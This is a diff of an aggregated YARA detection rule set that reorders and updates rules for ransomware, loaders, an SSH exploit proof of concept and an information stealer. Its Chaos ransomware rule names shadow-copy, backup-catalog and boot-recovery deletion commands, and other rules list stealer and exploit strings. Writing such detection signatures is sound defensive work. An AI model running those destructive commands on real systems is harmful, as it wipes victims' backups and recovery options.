-		hash = "bcc8c679acfc3aabf22ebdb2349b1fabd351a89fd23a716d85154049d352dd12"
-		logic_hash = "b01a68c60d62cf94ef16340316acb9b96d1e671c372559b86a8e6a5d8e80f7d9"
-		score = 80
-		quality = 80
-		tags = "FILE"
-
-	strings:
-		$op1 = { 1F 1A 58 1F 1A 58 28 }
-		$op2 = { 20 B3 00 00 00 8D ?? 00 00 01 13 ?? 11 ?? 16 20 02 00 01 00 }
-		$op3 = { 11 0? 11 0? 20 00 30 00 00 1F 40 28 ?? 00 00 06 }
-		$op4 = { 6E 20 FF 7F 00 00 6A FE 02 }
-		$s1 = "RawSecurityDescriptor" ascii
-		$s2 = "CommonAce" ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* ) and 2 of ( $op* )
-}
-rule COD3NYM_MAL_NET_Niximports_Loader_Jan24 : FILE
-{
-	meta:
-		description = "Detects open-source NixImports .NET malware loader. A stealthy loader using dynamic import resolving to evade static detection"
-		author = "Jonathan Peters"
-		id = "f36ad127-4c4b-5b7e-a13c-bfb9d222a438"
-		date = "2024-01-12"
-		modified = "2024-01-12"
-		reference = "https://github.com/dr4k0nia/NixImports/tree/master"
-		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/yara/dotnet/mal/mal_net_niximports_loader.yar#L1-L22"
-		license_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/LICENSE.md"
-		hash = "dd3f22871879b0bc4990c96d1de957848c7ed0714635bb036c73d8a989fb0b39"
-		logic_hash = "e41d7f4cb46aa0baa87d3024e0550efe5058ca49d908bbd34197431c7c054e58"
-		score = 80
-		quality = 80
-		tags = "FILE"
-
-	strings:
-		$op1 = { 1F 0A 64 06 1F 11 62 60 }
-		$op2 = { 03 20 4D 5A 90 00 94 4B 2A }
-		$op3 = { 20 DE 7A 1F F3 20 F7 1B 18 BC }
-		$op4 = { 20 CE 1F BE 70 20 DF 1F 3E F8 14 }
-		$sa1 = "OffsetToStringData" ascii
-		$sa2 = "GetRuntimeMethods" ascii
-		$sa3 = "netstandard" ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $sa* ) and 2 of ( $op* )
-}
 /*
  * YARA Rule Set
  * Repository Name: craiu
  * Repository: https://github.com/craiu/yararules
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: 23cf0ca22021fa3684e180a18416b9ae1b695243
  * Number of Rules: 13
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -177547,35 +177477,68 @@ Public License instead of this License.  But first, please read
 <https://www.gnu.org/licenses/why-not-lgpl.html>.
 
  */
-rule CRAIU_Crime_Lockbit3_Ransomware : FILE
+rule CRAIU_Crime_Chaos_Ransomware_Gen : FILE
 {
 	meta:
-		description = "Generic LockBit detection, also catches the version used in attacks in Indonesia."
-		author = "Costin G. Raiu, TLPBLACK, craiu@noh.ro"
-		id = "167788a4-a610-5770-9f51-aa4cc4d3d350"
-		date = "2024-07-03"
-		modified = "2024-07-03"
-		reference = "https://www.bleepingcomputer.com/news/security/meet-brain-cipher-the-new-ransomware-behind-indonesia-data-center-attack/"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/crime_lockbit3_ransomware.yara#L2-L32"
+		description = "Chaos ransomware generic strings"
+		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
+		id = "e909f7e4-50c2-54a6-8274-9ef92f95bf93"
+		date = "2024-05-27"
+		modified = "2024-05-28"
+		reference = "https://blog.sonicwall.com/en-us/2024/05/politically-charged-ransomware-weaponized-as-a-file-destroyer/"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/crime_chaos_ransomware.yara#L2-L39"
 		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		hash = "eb82946fa0de261e92f8f60aa878c9fef9ebb34fdababa66995403b110118b12"
-		hash = "6e07da23603fbe5b26755df5b8fec19cadf1f7001b1558ea4f12e20271263417"
-		logic_hash = "84efb899315379d85a03959359f89fbcb97cbb6477f1ec439380a4d15fed4f53"
+		hash = "524a898e18999ceac864dbac5b85fa2f14392e389b3c32f77d58e2a89cdf01c4"
+		logic_hash = "7d2e1c9178d5bf360cebc90056bbdae6a11729b1b3c5e963c522a29fd7ba7a3e"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		version = "1.1"
+		version = "1.0"
 
 	strings:
-		$a1 = {C3 8BFF53 51 6A0158 0FA2F7C1000000400F95C0 84C074090FC7F0 0FC7F2 59 5B C3 }
-		$a2 = {C3 6A0758 33C90FA2F7C3000004000F95C0 84C074090FC7F8 0FC7FA 59 5B C3 }
-		$a3 = {C3 0F31 8BC8 C1C90D 0F31 8BD0 C1C20D 8BC1 59 5B C3 }
-		$a4 = {55 8BEC 51 52 56 33C0 8B550C 8B7508 AC 33C9 B930000000 8D0C4D01000000 02F1 2AF1 33C9 B906000000 8D0C4D01000000 D3CA 03D0 90 85C0}
-		$a5 = {E9 ?? ?? ?? ?? 6683F841 720C 6683F846 7706 6683E837 EB26 6683F861 720C 6683F866 7706 6683E857 EB14 6683F830 720C 6683F839 7706 6683E830 EB}
-		$a6 = {5D 8BC3 5F 5E 5B 5D C20C00 90 55 8BEC 53 56 57 33C0 8B5D14 33C9 33D2 8B750C 8B7D08 85F6 }
+		$a0 = "<Exponent>AQAB</Exponent>" ascii wide fullword
+		$a2 = "<EncryptedKey>" ascii wide fullword
+		$a15 = "vssadmin delete shadows /all /quiet & wmic shadowcopy delete" ascii wide fullword
+		$a16 = "bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no" ascii wide fullword
+		$a17 = "wbadmin delete catalog -quiet" ascii wide fullword
+		$a18 = "C:\\Users\\" ascii wide fullword
+		$a22 = "/9j/4AAQSkZJRgABAQAAAQABAAD/4gHYSUNDX1BST0ZJTEUAAQEAAAHIAAAAAAQwAABtbnRyUkdCIFhZWiAH4AABAAEAAAAAAABhY3NwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA9tYAAQAAAADTLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlkZXNjAAAA8AAAACRyWFlaAAABFAAAABRnWFlaAAABKAAAABRiWFlaAAABPAAAABR3dHB0AAABUAAAABRyVFJDAAABZAAAAChnVFJDAAABZAAAAChiVFJDAAABZAAAAChjcHJ0AAABjAAAADxtbHVjAAAAAAAAAAEAAAAMZW5VUwAAAAgAAAAcAHMAUgBHAEJYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAAt4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9YWVogAAAAAAAA9tYAAQAAAADTLXBhcmEAAAAAAAQAAAACZmYAAPKnAAANWQAAE9AAAApbAAAAAAAAAABtbHVjAAAAAAAAAAEAAAAMZW5VUwAAACAAAAAcAEcAbwBvAGcAbABlACAASQBuAGMALgAgADIAMAAxADb/2wBDAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/2wBDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/wAARCAQ4B4ADAREAAhEBAxEB/8QAHwAAAAYDAQEBAAAAAAAAAAAABAUGBwgJAgMKAQAL/8QAgRAAAQIDBQQIAwcCAgQIAAI7AQIRAwQhAAUGMUEHElFhCBMicYGRofCxwdEJFCMyQuHxFVIzYhYkQ3IKFzRTY4KSshglRHOi0uIZJlRkg5PCJzU2RVZYdJaXo9PWGkZHVVeEprO1KDllZ3V2eIaHlJWktLbDxtTV1zd3xMVmp8f" ascii wide fullword
+		$a24 = "17CqMQFeuB3NTzJ" ascii wide fullword
+		$a25 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" ascii wide fullword
+		$a26 = "7z459ajrk722yn8c5j4fg" ascii wide
+		$a27 = "2X28tfRmWaPyPQgvoHV" ascii wide
+		$a28 = "1qw0ll8p9m8uezhqhyd" ascii wide
+		$b11 = "\\Saved Games" ascii wide fullword
 
 	condition:
-		( filesize < 1MB ) and ( uint16( 0 ) == 0x5a4d ) and ( 2 of them )
+		( filesize < 9MB ) and ( uint16( 0 ) == 0x5a4d ) and ( ( 3 of them ) )
+}
+rule CRAIU_Susp_Ios_Shutdown
+{
+	meta:
+		description = "Detect shutdown.log files from sysdiags with suspicious entries"
+		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
+		id = "08aa1fb9-7af0-515a-91a8-09ed35e48155"
+		date = "2023-12-28"
+		modified = "2024-03-05"
+		reference = "https://securelist.com/shutdown-log-lightweight-ios-malware-detection-method/111734/"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/susp_ios_shutdown.yara#L2-L25"
+		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
+		logic_hash = "936101f2dddb73f6dda41be47d775199c458aa4fecdcf348ed479da620343ea1"
+		score = 65
+		quality = 85
+		tags = ""
+		version = "1.0"
+		tlp = "TLP:CLEAR"
+
+	strings:
+		$a1 = "these clients are still here:"
+		$b1 = "/private/var/db/"
+		$b2 = "/private/var/tmp/"
+		$c1 = "After "
+
+	condition:
+		($c1 at 0 ) and $a1 and ( any of ( $b* ) )
 }
 rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Dropperandmainpayload : KWAMPIRS
 {
@@ -177788,132 +177751,6 @@ rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Shamoon : FILE
 	condition:
 		(( uint16( 0 ) == 0x5a4d ) and ( filesize < 4000KB ) and ( 3 of them ) )
 }
-rule CRAIU_Crime_Chaos_Ransomware_Gen : FILE
-{
-	meta:
-		description = "Chaos ransomware generic strings"
-		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
-		id = "e909f7e4-50c2-54a6-8274-9ef92f95bf93"
-		date = "2024-05-27"
-		modified = "2024-05-28"
-		reference = "https://blog.sonicwall.com/en-us/2024/05/politically-charged-ransomware-weaponized-as-a-file-destroyer/"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/crime_chaos_ransomware.yara#L2-L39"
-		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		hash = "524a898e18999ceac864dbac5b85fa2f14392e389b3c32f77d58e2a89cdf01c4"
-		logic_hash = "7d2e1c9178d5bf360cebc90056bbdae6a11729b1b3c5e963c522a29fd7ba7a3e"
-		score = 75
-		quality = 60
-		tags = "FILE"
-		version = "1.0"
-
-	strings:
-		$a0 = "<Exponent>AQAB</Exponent>" ascii wide fullword
-		$a2 = "<EncryptedKey>" ascii wide fullword
-		$a15 = "vssadmin delete shadows /all /quiet & wmic shadowcopy delete" ascii wide fullword
-		$a16 = "bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no" ascii wide fullword
-		$a17 = "wbadmin delete catalog -quiet" ascii wide fullword
-		$a18 = "C:\\Users\\" ascii wide fullword
-		$a22 = "/9j/4AAQSkZJRgABAQAAAQABAAD/4gHYSUNDX1BST0ZJTEUAAQEAAAHIAAAAAAQwAABtbnRyUkdCIFhZWiAH4AABAAEAAAAAAABhY3NwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA9tYAAQAAAADTLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlkZXNjAAAA8AAAACRyWFlaAAABFAAAABRnWFlaAAABKAAAABRiWFlaAAABPAAAABR3dHB0AAABUAAAABRyVFJDAAABZAAAAChnVFJDAAABZAAAAChiVFJDAAABZAAAAChjcHJ0AAABjAAAADxtbHVjAAAAAAAAAAEAAAAMZW5VUwAAAAgAAAAcAHMAUgBHAEJYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAAt4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9YWVogAAAAAAAA9tYAAQAAAADTLXBhcmEAAAAAAAQAAAACZmYAAPKnAAANWQAAE9AAAApbAAAAAAAAAABtbHVjAAAAAAAAAAEAAAAMZW5VUwAAACAAAAAcAEcAbwBvAGcAbABlACAASQBuAGMALgAgADIAMAAxADb/2wBDAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/2wBDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/wAARCAQ4B4ADAREAAhEBAxEB/8QAHwAAAAYDAQEBAAAAAAAAAAAABAUGBwgJAgMKAQAL/8QAgRAAAQIDBQQIAwcCAgQIAAI7AQIRAwQhAAUGMUEHElFhCBMicYGRofCxwdEJFCMyQuHxFVIzYhYkQ3IKFzRTY4KSshglRHOi0uIZJlRkg5PCJzU2RVZYdJaXo9PWGkZHVVeEprO1KDllZ3V2eIaHlJWktLbDxtTV1zd3xMVmp8f" ascii wide fullword
-		$a24 = "17CqMQFeuB3NTzJ" ascii wide fullword
-		$a25 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" ascii wide fullword
-		$a26 = "7z459ajrk722yn8c5j4fg" ascii wide
-		$a27 = "2X28tfRmWaPyPQgvoHV" ascii wide
-		$a28 = "1qw0ll8p9m8uezhqhyd" ascii wide
-		$b11 = "\\Saved Games" ascii wide fullword
-
-	condition:
-		( filesize < 9MB ) and ( uint16( 0 ) == 0x5a4d ) and ( ( 3 of them ) )
-}
-rule CRAIU_Susp_Ios_Shutdown
-{
-	meta:
-		description = "Detect shutdown.log files from sysdiags with suspicious entries"
-		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
-		id = "08aa1fb9-7af0-515a-91a8-09ed35e48155"
-		date = "2023-12-28"
-		modified = "2024-03-05"
-		reference = "https://securelist.com/shutdown-log-lightweight-ios-malware-detection-method/111734/"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/susp_ios_shutdown.yara#L2-L25"
-		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		logic_hash = "936101f2dddb73f6dda41be47d775199c458aa4fecdcf348ed479da620343ea1"
-		score = 65
-		quality = 85
-		tags = ""
-		version = "1.0"
-		tlp = "TLP:CLEAR"
-
-	strings:
-		$a1 = "these clients are still here:"
-		$b1 = "/private/var/db/"
-		$b2 = "/private/var/tmp/"
-		$c1 = "After "
-
-	condition:
-		($c1 at 0 ) and $a1 and ( any of ( $b* ) )
-}
-rule CRAIU_Crashstrike : FILE
-{
-	meta:
-		description = "Crowdstrike C-00000???-*.sys files"
-		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
-		id = "9a5168c4-0a7f-5269-bafa-728f123a04c5"
-		date = "2024-07-19"
-		modified = "2024-07-19"
-		reference = "https://en.wikipedia.org/wiki/July_2024_global_cyber_outages"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/20240719_crashstrike.yara#L2-L26"
-		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		hash = "9d001ef3206fe2f955095244e6103ad7f8f318c7c5cbd91a0dd1f33e4217fcb2"
-		logic_hash = "9a8dacf9d95042851073c40f5eab2a6aff61be3a576363ffcd8c21aaec7f0b96"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		version = "1.0"
-
-	strings:
-		$a1 = "000E0A000E0GHijklMNOPqRSTUVwX"
-		$a2 = "AbCDEfghIjklMNoPqrstuV"
-
-	condition:
-		( filesize < 60KB ) and ( uint32( 0 ) == 0xaaaaaaaa ) and ( all of them )
-}
-rule CRAIU_Exploit_CVE_2024_6387 : CVE_2024_6387 FILE
-{
-	meta:
-		description = "Strings from CVE-2024-6387 exploit PoC by zgzhang."
-		author = "Costin G. Raiu, TLPBLACK, craiu@noh.ro"
-		id = "6ac63016-864d-57af-bb36-3115a0a91021"
-		date = "2024-07-02"
-		modified = "2024-07-03"
-		reference = "https://github.com/zgzhang/cve-2024-6387-poc/tree/main"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/exploit_cve_2024_6387.yara#L2-L38"
-		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		hash = "62b06a6c30a0c891c2246ff87c0ad9ae03d2123601ba5331d6348c43b38d185e"
-		logic_hash = "d43a77c2690b5e01639590bc31fa64fa36b1da5efd3cc0761be7369ce80e4253"
-		score = 75
-		quality = 85
-		tags = "CVE-2024-6387, FILE"
-		version = "1.0"
-
-	strings:
-		$a0 = "Attempting exploitation with glibc base: 0x%lx" ascii wide fullword
-		$a1 = "Attempt %d of 20000" ascii wide fullword
-		$a2 = "Failed to establish connection, attempt %d" ascii wide fullword
-		$a3 = "SSH handshake failed, attempt %d" ascii wide fullword
-		$a4 = "Possible exploitation success on attempt %d with glibc base 0x%lx!" ascii wide fullword
-		$a5 = "Received SSH version: %s" ascii wide fullword
-		$a6 = "Connection closed while receiving SSH version" ascii wide fullword
-		$a7 = "Received KEX_INIT (%zd bytes)" ascii wide fullword
-		$a8 = "Connection closed while receiving KEX_INIT" ascii wide fullword
-		$a9 = "Estimated parsing time: %.6f seconds" ascii wide fullword
-		$a10 = "Received response after exploit attempt (%zd bytes)" ascii wide fullword
-		$a11 = "Possible hit on 'large' race window" ascii wide fullword
-		$a12 = "Connection closed by server - possible successful exploitation" ascii wide fullword
-		$a13 = "No immediate response from server - possible successful exploitation" ascii wide fullword
-		$a14 = "Attempt %d of 10000" ascii wide fullword
-
-	condition:
-		( filesize < 5MB ) and ( uint32be( 0 ) == 0x7F454C46 ) and ( 4 of ( $a* ) )
-}
 rule CRAIU_Unk_Liblzma_Backdoor : FILE
 {
 	meta:
@@ -177982,6 +177819,44 @@ rule CRAIU_Unk_Liblzma_Encstrings : FILE
 	condition:
 		( filesize < 15MB ) and ( any of them )
 }
+rule CRAIU_Exploit_CVE_2024_6387 : CVE_2024_6387 FILE
+{
+	meta:
+		description = "Strings from CVE-2024-6387 exploit PoC by zgzhang."
+		author = "Costin G. Raiu, TLPBLACK, craiu@noh.ro"
+		id = "6ac63016-864d-57af-bb36-3115a0a91021"
+		date = "2024-07-02"
+		modified = "2024-07-03"
+		reference = "https://github.com/zgzhang/cve-2024-6387-poc/tree/main"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/exploit_cve_2024_6387.yara#L2-L38"
+		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
+		hash = "62b06a6c30a0c891c2246ff87c0ad9ae03d2123601ba5331d6348c43b38d185e"
+		logic_hash = "d43a77c2690b5e01639590bc31fa64fa36b1da5efd3cc0761be7369ce80e4253"
+		score = 75
+		quality = 85
+		tags = "CVE-2024-6387, FILE"
+		version = "1.0"
+
+	strings:
+		$a0 = "Attempting exploitation with glibc base: 0x%lx" ascii wide fullword
+		$a1 = "Attempt %d of 20000" ascii wide fullword
+		$a2 = "Failed to establish connection, attempt %d" ascii wide fullword
+		$a3 = "SSH handshake failed, attempt %d" ascii wide fullword
+		$a4 = "Possible exploitation success on attempt %d with glibc base 0x%lx!" ascii wide fullword
+		$a5 = "Received SSH version: %s" ascii wide fullword
+		$a6 = "Connection closed while receiving SSH version" ascii wide fullword
+		$a7 = "Received KEX_INIT (%zd bytes)" ascii wide fullword
+		$a8 = "Connection closed while receiving KEX_INIT" ascii wide fullword
+		$a9 = "Estimated parsing time: %.6f seconds" ascii wide fullword
+		$a10 = "Received response after exploit attempt (%zd bytes)" ascii wide fullword
+		$a11 = "Possible hit on 'large' race window" ascii wide fullword
+		$a12 = "Connection closed by server - possible successful exploitation" ascii wide fullword
+		$a13 = "No immediate response from server - possible successful exploitation" ascii wide fullword
+		$a14 = "Attempt %d of 10000" ascii wide fullword
+
+	condition:
+		( filesize < 5MB ) and ( uint32be( 0 ) == 0x7F454C46 ) and ( 4 of ( $a* ) )
+}
 rule CRAIU_Crime_Noabot : FILE
 {
 	meta:
@@ -178024,14 +177899,69 @@ rule CRAIU_Crime_Noabot : FILE
 	condition:
 		filesize < 10MB and ( uint32( 0 ) == 0x464c457f ) and ( ( any of ( $a* ) ) or ( all of ( $b* ) ) or ( all of ( $c* ) ) )
 }
+rule CRAIU_Crime_Lockbit3_Ransomware : FILE
+{
+	meta:
+		description = "Generic LockBit detection, also catches the version used in attacks in Indonesia."
+		author = "Costin G. Raiu, TLPBLACK, craiu@noh.ro"
+		id = "167788a4-a610-5770-9f51-aa4cc4d3d350"
+		date = "2024-07-03"
+		modified = "2024-07-03"
+		reference = "https://www.bleepingcomputer.com/news/security/meet-brain-cipher-the-new-ransomware-behind-indonesia-data-center-attack/"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/crime_lockbit3_ransomware.yara#L2-L32"
+		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
+		hash = "eb82946fa0de261e92f8f60aa878c9fef9ebb34fdababa66995403b110118b12"
+		hash = "6e07da23603fbe5b26755df5b8fec19cadf1f7001b1558ea4f12e20271263417"
+		logic_hash = "84efb899315379d85a03959359f89fbcb97cbb6477f1ec439380a4d15fed4f53"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		version = "1.1"
+
+	strings:
+		$a1 = {C3 8BFF53 51 6A0158 0FA2F7C1000000400F95C0 84C074090FC7F0 0FC7F2 59 5B C3 }
+		$a2 = {C3 6A0758 33C90FA2F7C3000004000F95C0 84C074090FC7F8 0FC7FA 59 5B C3 }
+		$a3 = {C3 0F31 8BC8 C1C90D 0F31 8BD0 C1C20D 8BC1 59 5B C3 }
+		$a4 = {55 8BEC 51 52 56 33C0 8B550C 8B7508 AC 33C9 B930000000 8D0C4D01000000 02F1 2AF1 33C9 B906000000 8D0C4D01000000 D3CA 03D0 90 85C0}
+		$a5 = {E9 ?? ?? ?? ?? 6683F841 720C 6683F846 7706 6683E837 EB26 6683F861 720C 6683F866 7706 6683E857 EB14 6683F830 720C 6683F839 7706 6683E830 EB}
+		$a6 = {5D 8BC3 5F 5E 5B 5D C20C00 90 55 8BEC 53 56 57 33C0 8B5D14 33C9 33D2 8B750C 8B7D08 85F6 }
+
+	condition:
+		( filesize < 1MB ) and ( uint16( 0 ) == 0x5a4d ) and ( 2 of them )
+}
+rule CRAIU_Crashstrike : FILE
+{
+	meta:
+		description = "Crowdstrike C-00000???-*.sys files"
+		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
+		id = "9a5168c4-0a7f-5269-bafa-728f123a04c5"
+		date = "2024-07-19"
+		modified = "2024-07-19"
+		reference = "https://en.wikipedia.org/wiki/July_2024_global_cyber_outages"
+		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/20240719_crashstrike.yara#L2-L26"
+		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
+		hash = "9d001ef3206fe2f955095244e6103ad7f8f318c7c5cbd91a0dd1f33e4217fcb2"
+		logic_hash = "9a8dacf9d95042851073c40f5eab2a6aff61be3a576363ffcd8c21aaec7f0b96"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		version = "1.0"
+
+	strings:
+		$a1 = "000E0A000E0GHijklMNOPqRSTUVwX"
+		$a2 = "AbCDEfghIjklMNoPqrstuV"
+
+	condition:
+		( filesize < 60KB ) and ( uint32( 0 ) == 0xaaaaaaaa ) and ( all of them )
+}
 /*
  * YARA Rule Set
  * Repository Name: DitekSHen
  * Repository: https://github.com/ditekshen/detection
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: e76c93dcdedff04076380ffc60ea54e45b313635
- * Number of Rules: 1436
- * Skipped: 0 (age), 117 (quality), 0 (score), 0 (importance)
+ * Number of Rules: 1442
+ * Skipped: 0 (age), 111 (quality), 0 (score), 0 (importance)
  *
  *
  * LICENSE
@@ -178263,7 +178193,7 @@ rule DITEKSHEN_INDICATOR_SUSPICIOUS_AHK_Downloader : FILE
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
 		logic_hash = "8806d8c03adb4ea4cd9b806f8f8c21e561b39b5602c70d09ed193e35e1502d35"
 		score = 40
-		quality = 20
+		quality = 45
 		tags = "FILE"
 		importance = 20
 
@@ -178504,6 +178434,35 @@ rule DITEKSHEN_INDICATOR_SUSPICIOUS_PWSH_Asciiencoding_Pattern : FILE
 	condition:
 		1 of ( $enc* ) and 4 of ( $s* ) and filesize < 2500KB
 }
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_JS_Hex_B64Encoded_EXE : FILE
+{
+	meta:
+		description = "Detects JavaScript files hex and base64 encoded executables"
+		author = "ditekSHen"
+		id = "37516c6b-0a77-5a20-a36f-5f8309b37362"
+		date = "2020-11-06"
+		modified = "2024-06-08"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L726-L740"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "60185e6ec96875085ffb7a6bf6eb8643368bbce42b89290ab987eb32c1e153bd"
+		score = 40
+		quality = 20
+		tags = "FILE"
+		importance = 20
+
+	strings:
+		$s1 = ".SaveToFile" ascii
+		$s2 = ".Run" ascii
+		$s3 = "ActiveXObject" ascii
+		$s4 = "fromCharCode" ascii
+		$s5 = "\\x66\\x72\\x6F\\x6D\\x43\\x68\\x61\\x72\\x43\\x6F\\x64\\x65" ascii
+		$binary = "\\x54\\x56\\x71\\x51\\x41\\x41" ascii
+		$pattern = /[\s\{\(\[=]_0x[0-9a-z]{3,6}/ ascii
+
+	condition:
+		$binary and $pattern and 2 of ( $s* ) and filesize < 2500KB
+}
 rule DITEKSHEN_INDICATOR_SUSPICIOUS_WMIC_Downloader : FILE
 {
 	meta:
@@ -178802,7 +178761,7 @@ rule DITEKSHEN_INDICATOR_SUSPICIOUS_Finger_Download_Pattern
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
 		logic_hash = "04cbb1abc4c3d2990bae798ece052eb8aa1b5104b5712e98aeb80731316b9c57"
 		score = 40
-		quality = 20
+		quality = 45
 		tags = ""
 		importance = 20
 
@@ -180180,37399 +180139,37563 @@ rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_References_Publicserviceinterface : FILE
 	condition:
 		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and 1 of them
 }
-rule DITEKSHEN_INDICATOR_JAVA_Packed_Allatori
+rule DITEKSHEN_MALWARE_Win_Laturo : FILE
 {
 	meta:
-		description = "Detects files packed with Allatori Java Obfuscator"
+		description = "Laturo information stealer payload"
 		author = "ditekSHen"
-		id = "16b9f455-ba73-5f09-9822-8349c53fa965"
+		id = "221a1ee8-e1ae-558c-919c-e3f55c1500f0"
 		date = "2020-11-06"
-		modified = "2023-08-29"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_packed.yar#L113-L121"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3-L26"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ac48a573eb9d9fffe38d09993ff062f308edb07b8a7498e332cc3eb501d48db7"
+		logic_hash = "bfb0c5676c926f58a4395a56dad09b37e8ac1cf0bf6b5521767c16698644b73a"
 		score = 75
-		quality = 75
-		tags = ""
-		importance = 20
+		quality = 61
+		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.Laturo"
 
 	strings:
-		$s1 = "# Obfuscation by Allatori Obfuscator" ascii wide
+		$str1 = "cmd.exe /c ping 127.0.0.1" ascii wide
+		$str2 = "cmd.exe /c start" ascii wide
+		$str3 = "\\RapidLoader\\" ascii
+		$str4 = "loader/gate.php" ascii wide
+		$str5 = "Hwid:" ascii wide
+		$str6 = "Special:" ascii wide
+		$str7 = "logs=%s" ascii
+		$data1 = "cookies.%u.txt" nocase ascii wide
+		$data2 = "passwords.%u.txt" nocase ascii wide
+		$data3 = "credentials.%u.txt" nocase ascii wide
+		$data4 = "cards.%u.txt" nocase ascii wide
+		$data5 = "autofill.%u.txt" nocase ascii wide
+		$data6 = "loginusers.vdf" ascii wide
+		$data7 = "screenshot.bmp" nocase ascii wide
